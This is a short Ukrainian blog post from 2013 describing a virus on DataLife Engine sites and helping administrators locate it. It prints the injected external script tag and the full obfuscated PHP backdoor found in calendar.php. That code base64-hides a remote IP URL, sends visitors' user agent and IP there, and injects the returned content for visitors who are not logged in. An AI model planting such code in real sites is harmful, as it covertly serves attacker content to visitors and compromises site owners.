Вірус DLE
Створюю і просуваю комерційні сайти та інтернет-магазини з 2008 року. 17-05-2013, 00:33 1 943 0Ця гидота з'явилась в 2013 році та попортила нерви не оному адміну.
Вірус не підзавантажується на сторінки зареєстрованим користвачам та адмінам.
На початок сторінки перед !DOCTYPE html PUBLIC підзавантажується скрипт:
<script src="http://gtrhykiulo.dyndns.info/
showforum.php?pid=152" type="text/jаvascript">
</script>
Вірус як правило сидить в одному з файлів у папках:
- "language"
- "engine"
- "engine/classes"
- "engine/modules/"
Особисто у мене сидів в файлі "engine/modules/calendar.php"
І має такий вигляд:
function getnewsfromid($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news_by_list (date("j"));
?>